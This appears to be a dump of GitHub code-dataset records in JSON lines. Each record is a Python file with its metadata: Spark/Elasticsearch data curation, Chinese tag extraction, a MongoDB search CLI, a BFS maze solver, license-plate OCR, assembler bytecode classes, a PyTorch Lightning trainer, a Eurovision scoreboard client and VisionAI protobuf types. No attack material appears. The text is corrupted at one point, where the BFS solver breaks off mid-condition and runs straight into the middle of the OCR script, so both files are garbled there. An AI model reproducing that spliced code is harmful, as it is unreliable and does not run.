df.select(col('bike'),\n\t\t\t\t\tcol('location'),\n\t\t\t\t\tdf.result.cast('float').alias('result'),\n\t\t\t\t\tcol('sampling_time'), \n\t\t\t\t\tcol('variable'))\ndf_curation = df_float.where('result is not null')\n\ndf2elastic(es,index_output,doc_type,df_curation)\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n#---------------------------PIVOTING-----------------------------------#\n#elasticsearch variables\nindex = \"bike2_sensors\"\nindex_output = \"pivoted_sensors\"\ndoc_type = \"IoT\" \n\n#input\ndf = sf.elastic2df(es,index,doc_type,sqlContext)\n\n#transformations\ndf = 
sf.transform(df)\ndf_full = sf.pivoting(df)\n\nsf.df2elastic(es,index_output,doc_type,df_full)\n\npath = '/home/marcroig/Desktop/data/reports/pivoted_report.html'\nsf.createReport(df_full,path)\n\n\n", "repo_name": "marcroiglama/GIVO", "sub_path": "Data Preparation Layer/Data Curation module/curation_main.py", "file_name": "curation_main.py", "file_ext": "py", "file_size_in_byte": 1474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "time.time", "line_number": 7, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 10, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 10, "usage_type": "name"}, {"api_name": "pyspark.sql.SQLContext", "line_number": 11, "usage_type": "call"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 12, "usage_type": "call"}, {"api_name": "spark_functions.elastic2df", "line_number": 22, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 23, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 24, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 26, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 27, "usage_type": "call"}, {"api_name": "spark_functions.df2elastic", "line_number": 30, "usage_type": "call"}, {"api_name": "time.time", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "19784992703", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport fire\nimport json\nimport jieba\n\njieba.load_userdict(\"tags.dict\")\n\n\ndef extract_tags(line):\n    tags = list()\n    cuts = jieba.cut(line, cut_all=False, HMM=False)\n    res = list(cuts)\n    for i, word in enumerate(res):\n        if word == ':':\n            tags.append(res[i - 1])\n\n    return tags\n\n\n@fire.Fire\ndef get_all_tags(input, output):\n    tag_count = {}\n    with open(input) as in_f, open(output, 'w') as out_f:\n        for line in in_f:\n            tags = extract_tags(line)\n            for tag in tags:\n                if tag.isascii():\n                    continue\n                if tag in tag_count:\n                    tag_count[tag] += 1\n                else:\n                    tag_count[tag] = 1\n\n        json.dump(tag_count, out_f)\n", "repo_name": "dragonkid/portrait", "sub_path": "get_all_tags.py", "file_name": "get_all_tags.py", "file_ext": "py", "file_size_in_byte": 803, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "jieba.load_userdict", "line_number": 7, "usage_type": "call"}, {"api_name": "jieba.cut", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 35, "usage_type": "call"}, {"api_name": "fire.Fire", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "21694822711", "text": "from commands import search_tag, search_tags, search_name\nfrom mongoengine import disconnect\n\n\nif __name__ == \"__main__\":\n    while True:\n        command = input(\"Type a command as 'command: search'\\n>>> \")\n        to_do = command.split(\":\")[0].strip()\n        search = command.split(\":\")[1].strip() if \":\" in command else \"\"\n        if to_do in [\"tag\", \"tags\", \"name\"]:\n            if to_do == \"tag\":\n                print(search_tag(search))\n            elif to_do == \"tags\":\n                tags = [tag.strip() for tag in search.split(\",\")]\n                print(search_tags(tags))\n            else:\n                print(search_name(search))\n        elif to_do == \"exit\":\n            break\n        else:\n            print(\"Wrong command\")\n\n    disconnect()\n", "repo_name": "MartynyukAndriy/Go_It_Python_Web", 
"sub_path": "HW8/Mongo/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "commands.search_tag", "line_number": 12, "usage_type": "call"}, {"api_name": "commands.search_tags", "line_number": 15, "usage_type": "call"}, {"api_name": "commands.search_name", "line_number": 17, "usage_type": "call"}, {"api_name": "mongoengine.disconnect", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "180980065", "text": "from __future__ import annotations\nfrom functools import reduce\nimport sys\n\nfrom bespokeasm.assembler.line_identifier import LineIdentifier\nfrom bespokeasm.assembler.label_scope import LabelScope\nfrom bespokeasm.assembler.memory_zone import MemoryZone\nfrom bespokeasm.expression import parse_expression\n\nfrom .packed_bits import PackedBits\n\n\nclass ByteCodePart:\n def __init__(self, value_size: int, byte_align: bool, endian: str, line_id: LineIdentifier) -> None:\n self._value_size = value_size\n self._byte_align = byte_align\n self._endian = endian\n self._line_id = line_id\n\n @property\n def value_size(self) -> int:\n return self._value_size\n\n @property\n def byte_align(self) -> bool:\n return self._byte_align\n\n @property\n def endian(self) -> str:\n return self._endian\n\n @property\n def line_id(self) -> LineIdentifier:\n return self._line_id\n\n def __repr__(self) -> str:\n return str(self)\n\n def __str__(self) -> str:\n raise NotImplementedError\n\n def __eq__(self, other: ByteCodePart) -> bool:\n return \\\n self._value_size == other._value_size \\\n and self._byte_align == other._byte_align \\\n and self._endian == other._endian\n\n @property\n def instruction_string(self) -> str:\n sys.exit(f'ERROR: INTERNAL - fetching ByteCodePart instruction string unimplemented for: {self}')\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n # this should be overridden\n raise NotImplementedError\n\n def contains_register_labels(self, register_labels: set[str]) -> bool:\n return False\n\n\nclass NumericByteCodePart(ByteCodePart):\n def __init__(self, value: int, value_size: int, byte_align: bool, endian: str, line_id: LineIdentifier) -> None:\n super().__init__(value_size, byte_align, endian, line_id)\n self._value = value\n\n @property\n def instruction_string(self) -> str:\n return str(self._value)\n\n def __str__(self) -> str:\n return f'NumericByteCodePart'\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n return self._value\n\n\nclass ExpressionByteCodePart(ByteCodePart):\n def __init__(\n self,\n value_expression: str,\n value_size: int,\n byte_align: bool,\n endian: str,\n line_id: LineIdentifier,\n ) -> None:\n super().__init__(value_size, byte_align, endian, line_id)\n self._expression = value_expression\n self._parsed_expression = parse_expression(self.line_id, self._expression)\n\n @property\n def instruction_string(self) -> str:\n return self._expression.strip()\n\n def __str__(self) -> str:\n return f'ExpressionByteCodePart'\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n value = self._parsed_expression.get_value(label_scope, self.line_id)\n if isinstance(value, str):\n sys.exit(f'ERROR: {self.line_id} - expression \"{self._expression}\" did not resolve to an int, got: {value}')\n return value\n\n def contains_register_labels(self, 
register_labels: set[str]) -> bool:\n        return self._parsed_expression.contains_register_labels(register_labels)\n\n\nclass ExpressionByteCodePartWithValidation(ExpressionByteCodePart):\n    def __init__(\n            self,\n            max_value: int,\n            min_value: int,\n            value_expression: str,\n            value_size: int,\n            byte_align: bool,\n            endian: str,\n            line_id: LineIdentifier\n    ) -> None:\n        super().__init__(value_expression, value_size, byte_align, endian, line_id)\n        self._max = max_value\n        self._min = min_value\n\n    def __str__(self) -> str:\n        return f'ExpressionByteCodePartWithValidation'\n\n    def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n        value = super().get_value(label_scope, instruction_address, instruction_size)\n        if self._max is not None and value > self._max:\n            sys.exit(f'ERROR: {self.line_id} - operand value of {value} exceeds maximum allowed of {self._max}')\n        if self._min is not None and value < self._min:\n            sys.exit(f'ERROR: {self.line_id} - operand value of {value} is less than minimum allowed of {self._min}')\n        return value\n\n\nclass ExpressionByteCodePartInMemoryZone(ExpressionByteCodePart):\n    def __init__(\n            self,\n            memzone: MemoryZone,\n            value_expression: str,\n            value_size: int,\n            byte_align: bool,\n            endian: str,\n            line_id: LineIdentifier,\n    ) -> None:\n        super().__init__(value_expression, value_size, byte_align, endian, line_id)\n        self._memzone = memzone\n\n    def __str__(self) -> str:\n        return f'ExpressionByteCodePartInMemoryZone'\n\n    def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n        value = super().get_value(label_scope, instruction_address, instruction_size)\n        if self._memzone is not None:\n            if value > self._memzone.end:\n                sys.exit(\n                    f'ERROR: {self.line_id} - address value of {value} exceeds maximum allowed '\n                    f'address of {self._memzone.end} in memory zone {self._memzone.name}'\n                )\n            if value < self._memzone.start:\n                sys.exit(\n                    f'ERROR: {self.line_id} - address value of {value} is less than minimum allowed '\n                    f'address of {self._memzone.start} in memory zone {self._memzone.name}'\n                )\n        return value\n\n\nclass ExpressionEnumerationByteCodePart(ExpressionByteCodePart):\n    def __init__(\n            self,\n            value_dict: dict[int, int],\n            value_expression: str,\n            value_size: int,\n            byte_align: bool,\n            endian: str,\n            line_id: LineIdentifier\n    ) -> None:\n        super().__init__(value_expression, value_size, byte_align, endian, line_id)\n        self._value_dict = value_dict\n\n    def __str__(self) -> str:\n        return f'ExpressionEnumerationByteCodePart'\n\n    def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n        value = super().get_value(label_scope, instruction_address, instruction_size)\n        if value not in self._value_dict:\n            sys.exit(\n                f'ERROR: {self.line_id} - numeric expression value of {value} is '\n                f'not an allowed value for numeric enumeration.'\n            )\n        return self._value_dict[value]\n\n\nclass CompositeByteCodePart(ByteCodePart):\n    _parts_list: list[ByteCodePart]\n\n    def __init__(self, bytecode_parts: list[ByteCodePart], byte_align: bool, endian: str, line_id: LineIdentifier) -> None:\n        total_size = reduce(lambda a, b: a+b.value_size, bytecode_parts, 0)\n        super().__init__(total_size, byte_align, endian, line_id)\n        self._parts_list = bytecode_parts\n\n    def __str__(self) -> str:\n        return f'CompositeByteCodePart'\n\n    def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n        bits = PackedBits()\n        for p in self._parts_list:\n            
bits.append_bits(\n                p.get_value(\n                    label_scope,\n                    instruction_address,\n                    instruction_size,\n                ),\n                p.value_size,\n                False,\n                self.endian,\n            )\n        value = int.from_bytes(bits.get_bytes(), self.endian)\n        if self.value_size % 8 != 0:\n            shift_count = 8 - (self.value_size % 8)\n            value = value >> shift_count\n        return value\n", "repo_name": "michaelkamprath/bespokeasm", "sub_path": "src/bespokeasm/assembler/bytecode/parts.py", "file_name": "parts.py", "file_ext": "py", "file_size_in_byte": 8255, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "86", "api": [{"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 14, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 33, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 52, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 61, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 72, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 83, "usage_type": "name"}, {"api_name": "bespokeasm.expression.parse_expression", "line_number": 87, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 96, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 99, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 115, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 124, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 127, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 129, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.memory_zone.MemoryZone", "line_number": 136, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 141, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 149, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 153, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 158, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 173, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 181, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 184, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 194, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 195, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 202, "usage_type": "name"}, {"api_name": "packed_bits.PackedBits", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "70373552605", "text": "from collections import deque\r\nimport sys\r\ndef init(n,m,k)->list:\r\n    return [ [int(j) for j in sys.stdin.readline().rstrip()] for i in range(n)]\r\ndef BFS(maze:list,k:int)->int:\r\n    q=deque([(0,0,0)])# current position, number of smashed walls\r\n    dp=[ [ [0]*len(maze[0]) for i in range(len(maze))] for _ in range(k+1) ]\r\n    dp[0][0][0]=1\r\n    indexInfo=list(zip([-1,0,1,0],[0,1,0,-1]))\r\n    while q:\r\n        curI,curJ,curSmashed=q.popleft()\r\n        if curI==len(maze)-1 and curJ==len(maze[0])-1 and 
0<=curSmashed<=k: return dp[curSmashed][curI][curJ]\r\n for i,j in indexInfo:\r\n newI=curI+i;newJ=curJ+j\r\n if 0<=newI 1000 and area < 3000:\n x, y, w, h = cv2.boundingRect(c)\n ROI = 255 - thresh[(y - 8):(y+h+8), (x-8):(x+w+8)] # just inverts the colors\n ROI = cv2.resize(ROI, dsize = (100, 100), interpolation = cv2.INTER_LANCZOS4)\n result.append(ROI)\n # cv2.drawContours(mask, [c], -1, (255, 255, 255), -1)\n # cv2.imwrite('ROI_{}.png'.format(ROI_number), ROI) # this exports an image file\n # ROI_number += 1\n return result\n\nindiv_digits = plate_digits(zoom_plate)\n# for d in indiv_digits:\n# cv2.imshow('digit', d) # will pop up in a separate window\n# cv2.waitKey()\n", "repo_name": "jaotheboss/License-Plate-Reading-OCR", "sub_path": "license_plate.py", "file_name": "license_plate.py", "file_ext": "py", "file_size_in_byte": 5292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.imread", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.CascadeClassifier", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "pytesseract.image_to_string", "line_number": 88, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 91, "usage_type": "call"}, {"api_name": "re.search", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 109, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 111, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "imutils.contours.sort_contours", "line_number": 115, "usage_type": "call"}, {"api_name": "imutils.contours", "line_number": 115, "usage_type": "name"}, {"api_name": "cv2.contourArea", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 121, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.INTER_LANCZOS4", "line_number": 123, "usage_type": "attribute"}]} +{"seq_id": "12135442283", "text": "from typing import Dict, Union\nimport pytorch_lightning as pl\nfrom colorama import Fore\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping, 
RichProgressBar\nfrom torch.utils.data import DataLoader\nfrom general_files.utils.common_util import CustomCometLoggerForPL, get_logger\nfrom general_files.utils.data_util import dict_list_to_tensor\n\nlog = get_logger(__name__)\n\n\nclass ModelTrainer:\n    def __init__(\n        self,\n        config,\n        model,\n        train_dataset,\n        eval_dataset,\n        tokenizer,\n        experiment,\n    ):\n        if config.stage == 'finetune':\n            # Due to a quirk of the framework, the model would resume training from the ckpt checkpoint if this is not set\n            # To load only the model weights, the setting below is required\n            config.ckpt_path = None\n        self.config = config\n        self.model = model\n        self.config.dataset_size = len(train_dataset)\n        self.model.train_dataset = train_dataset\n        self.model.val_dataset = eval_dataset\n\n        class DataModule(pl.LightningDataModule):\n            def __init__(self, train_dataset, eval_dataset, collate_fn):\n                super().__init__()\n                self.train_dataset, self.eval_dataset = train_dataset, eval_dataset\n                self.collate_fn = collate_fn\n\n            def train_dataloader(self):\n                return DataLoader(self.train_dataset,\n                                  batch_size=config.train_batch_size,\n                                  shuffle=True,\n                                  pin_memory=config.dataloader_pin_memory,\n                                  num_workers=config.dataloader_num_workers,\n                                  collate_fn=self.collate_fn\n                                  )\n\n            def val_dataloader(self):\n                return DataLoader(self.eval_dataset,\n                                  batch_size=config.train_batch_size,\n                                  shuffle=True,\n                                  pin_memory=config.dataloader_pin_memory,\n                                  num_workers=config.dataloader_num_workers,\n                                  collate_fn=self.collate_fn)\n        self.data_module = DataModule(train_dataset, eval_dataset, self.collate_fn)\n\n        self.tokenizer = tokenizer\n        if experiment:\n            logger = CustomCometLoggerForPL()\n            logger._experiment = experiment\n        else:\n            logger = None\n\n        class LiteProgressBar(pl.callbacks.progress.TQDMProgressBar):\n            def __init__(self, refresh_rate: int = 1, process_position: int = 0):\n                super().__init__(refresh_rate, process_position)\n\n            def get_metrics(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> Dict[str, Union[int, str]]:\n                items = super().get_metrics(trainer, pl_module)\n                # items['ppl'] = round(items['ppl'], 1) if 'ppl' in items else None\n                items['lr'] = round(items['lr'], 7) if 'lr' in items else None\n                items.pop(\"v_num\", None)\n                return items\n\n            def init_train_tqdm(self):\n                bar = super().init_train_tqdm()\n                bar.bar_format = '%s{l_bar}%s{bar}%s{r_bar}' % (Fore.GREEN, Fore.GREEN, Fore.GREEN)\n                return bar\n\n            def init_validation_tqdm(self):\n                bar = super().init_validation_tqdm()\n                bar.set_description('Validating')\n                bar.bar_format = '%s{l_bar}%s{bar}%s{r_bar}' % (Fore.GREEN, Fore.GREEN, Fore.GREEN)\n                bar.leave = False\n                return bar\n\n        checkpoint_callback = ModelCheckpoint(monitor=config.checkpoint_monitor,\n                                              mode=config.checkpoint_monitr_mode,\n                                              save_top_k=config.save_total_limit,\n                                              save_last=True,\n                                              verbose=True,\n                                              dirpath=config.result_path,\n                                              filename=\"best_model\",\n                                              auto_insert_metric_name=False,\n                                              )\n\n        early_stop_callback = EarlyStopping(\n            monitor=config.checkpoint_monitor,\n            min_delta=0.001,\n            patience=5,\n            verbose=True,\n            mode=config.checkpoint_monitr_mode,\n        )\n\n        # Explicitly specify the process group backend if you choose to\n        callbacks = [checkpoint_callback,\n                     early_stop_callback,\n                     LiteProgressBar(),\n                     ]\n\n        self.trainer = pl.Trainer(logger=logger,\n                                  callbacks=callbacks,\n                                  **config.pl_train_args)\n\n    def collate_fn(self, batch):\n        return dict_list_to_tensor(batch)\n\n    def train(self):\n        if self.config.pl_train_args.auto_lr_find:\n            lr_finder = self.trainer.tuner.lr_find(self.model, datamodule=self.data_module)\n            # Plot the loss and learning-rate curves\n            fig = lr_finder.plot(suggest=True)\n            fig.show()\n            # Set the learning rate to the suggested value\n            self.model.config.lr = 
lr_finder.suggestion()\n self.trainer.fit(model=self.model,\n datamodule=self.data_module\n )\n", "repo_name": "Xingxl2studious/baseline", "sub_path": "general_files/trainer/base_trainer.py", "file_name": "base_trainer.py", "file_ext": "py", "file_size_in_byte": 5475, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "general_files.utils.common_util.get_logger", "line_number": 9, "usage_type": "call"}, {"api_name": "pytorch_lightning.LightningDataModule", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 48, "usage_type": "call"}, {"api_name": "general_files.utils.common_util.CustomCometLoggerForPL", "line_number": 58, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 63, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 67, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 76, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 76, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 82, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 82, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 86, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 96, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 110, "usage_type": "call"}, {"api_name": "general_files.utils.data_util.dict_list_to_tensor", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "41831813012", "text": "from pip._vendor import requests\n\n\nENTRIES = [\n \"Austria\".lower(),\n \"Belgium\".lower(),\n \"Denmark\".lower(),\n \"Finland\".lower(),\n \"France\".lower(),\n \"Germany\".lower(),\n \"Greece\".lower(),\n \"Iceland\".lower(),\n \"Ireland\".lower(),\n \"Israel\".lower(),\n \"Italy\".lower(),\n \"Luxembourg\".lower(),\n \"Netherlands\".lower(),\n \"Norway\".lower(),\n \"Portugal\".lower(),\n \"Spain\".lower(),\n \"Sweden\".lower(),\n \"Switzerland\".lower(),\n \"Turkey\".lower(),\n \"United Kingdom\".lower(),\n \"Yugoslavia\".lower(),\n]\n\nclass State:\n\n def __init__(self):\n self.current_votes_list = dict()\n\n def change_name(self, name):\n self.current_voter = name\n requests.post(\"http://localhost:5000/name\", {\n \"name\": name\n })\n\n def finish_voting(self, exporter):\n # print(f\"{self.current_voter} done! 
scores {self.current_votes_list}\")\n exporter.add_votes(self.current_votes_list, self.current_voter)\n requests.post(\"http://localhost:5000/reset\", {})\n\n def add_vote(self, country, previous_rank, new_rank):\n self.current_votes_list[country] = new_rank\n requests.post(\"http://localhost:5000/vote\", {\n \"country\": country,\n \"previous_rank\": previous_rank,\n \"new_rank\": new_rank\n })\n\n def cancel_vote(self):\n requests.post(\"http://localhost:5000/cancel\", {})\nhistory = []\n\n\nVOTERS = [\"Marko\", \"Ed\", \"Rinor\", \"Luke\", \"Simon\", \"Matteo\", \"Costa\", \"Rodrigo\", \"Pedro\", \"Vladan\", \"Philip\", \"Oliver\", \"Thomas\", \"Nathan\", \"Wiv\", \"Hlynur\", \"Aivis\"]\n", "repo_name": "marko-travelperk/ESCScoreboard", "sub_path": "ESCScoreboard-BE/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1583, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pip._vendor.requests.post", "line_number": 35, "usage_type": "call"}, {"api_name": "pip._vendor.requests", "line_number": 35, "usage_type": "name"}, {"api_name": "pip._vendor.requests.post", "line_number": 42, "usage_type": "call"}, {"api_name": "pip._vendor.requests", "line_number": 42, "usage_type": "name"}, {"api_name": "pip._vendor.requests.post", "line_number": 46, "usage_type": "call"}, {"api_name": "pip._vendor.requests", "line_number": 46, "usage_type": "name"}, {"api_name": "pip._vendor.requests.post", "line_number": 53, "usage_type": "call"}, {"api_name": "pip._vendor.requests", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "69941883805", "text": "from __future__ import annotations\n\nfrom typing import MutableMapping, MutableSequence\n\nimport proto # type: ignore\n\nfrom visionai.python.gapic.visionai.visionai_v1.types import lva\nfrom google.protobuf import timestamp_pb2 # type: ignore\n\n\n__protobuf__ = proto.module(\n package='google.cloud.visionai.v1',\n manifest={\n 'Operator',\n 'Analysis',\n 'Process',\n },\n)\n\n\nclass Operator(proto.Message):\n r\"\"\"Message describing the Operator object.\n\n Attributes:\n name (str):\n Name of the resource.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The create timestamp.\n update_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The update timestamp.\n labels (MutableMapping[str, str]):\n Labels as key value pairs.\n operator_definition (google.cloud.visionai_v1.types.OperatorDefinition):\n The definition of the operator.\n docker_image (str):\n The link to the docker image of the operator.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n create_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=2,\n message=timestamp_pb2.Timestamp,\n )\n update_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=3,\n message=timestamp_pb2.Timestamp,\n )\n labels: MutableMapping[str, str] = proto.MapField(\n proto.STRING,\n proto.STRING,\n number=4,\n )\n operator_definition: lva.OperatorDefinition = proto.Field(\n proto.MESSAGE,\n number=5,\n message=lva.OperatorDefinition,\n )\n docker_image: str = proto.Field(\n proto.STRING,\n number=6,\n )\n\n\nclass Analysis(proto.Message):\n r\"\"\"Message describing the Analysis object.\n\n Attributes:\n name (str):\n The name of resource.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The create timestamp.\n update_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. 
The update timestamp.\n labels (MutableMapping[str, str]):\n Labels as key value pairs.\n analysis_definition (google.cloud.visionai_v1.types.AnalysisDefinition):\n The definition of the analysis.\n input_streams_mapping (MutableMapping[str, str]):\n Map from the input parameter in the definition to the real\n stream. E.g., suppose you had a stream source operator named\n \"input-0\" and you try to receive from the real stream\n \"stream-0\". You can add the following mapping: [input-0:\n stream-0].\n output_streams_mapping (MutableMapping[str, str]):\n Map from the output parameter in the definition to the real\n stream. E.g., suppose you had a stream sink operator named\n \"output-0\" and you try to send to the real stream\n \"stream-0\". You can add the following mapping: [output-0:\n stream-0].\n disable_event_watch (bool):\n Boolean flag to indicate whether you would\n like to disable the ability to automatically\n start a Process when new event happening in the\n input Stream. If you would like to start a\n Process manually, the field needs to be set to\n true.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n create_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=2,\n message=timestamp_pb2.Timestamp,\n )\n update_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=3,\n message=timestamp_pb2.Timestamp,\n )\n labels: MutableMapping[str, str] = proto.MapField(\n proto.STRING,\n proto.STRING,\n number=4,\n )\n analysis_definition: lva.AnalysisDefinition = proto.Field(\n proto.MESSAGE,\n number=5,\n message=lva.AnalysisDefinition,\n )\n input_streams_mapping: MutableMapping[str, str] = proto.MapField(\n proto.STRING,\n proto.STRING,\n number=6,\n )\n output_streams_mapping: MutableMapping[str, str] = proto.MapField(\n proto.STRING,\n proto.STRING,\n number=7,\n )\n disable_event_watch: bool = proto.Field(\n proto.BOOL,\n number=8,\n )\n\n\nclass Process(proto.Message):\n r\"\"\"Message describing the Process object.\n\n Attributes:\n name (str):\n The name of resource.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The create timestamp.\n update_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The update timestamp.\n analysis (str):\n Required. Reference to an existing Analysis\n resource.\n attribute_overrides (MutableSequence[str]):\n Optional. Attribute overrides of the Analyzers. Format for\n each single override item:\n \"{analyzer_name}:{attribute_key}={value}\".\n run_status (google.cloud.visionai_v1.types.RunStatus):\n Optional. Status of the Process.\n run_mode (google.cloud.visionai_v1.types.RunMode):\n Optional. Run mode of the Process.\n event_id (str):\n Optional. Event ID of the input/output\n streams. This is useful when you have a\n StreamSource/StreamSink operator in the\n Analysis, and you want to manually specify the\n Event to read from/write to.\n batch_id (str):\n Optional. Optional: Batch ID of the Process.\n retry_count (int):\n Optional. 
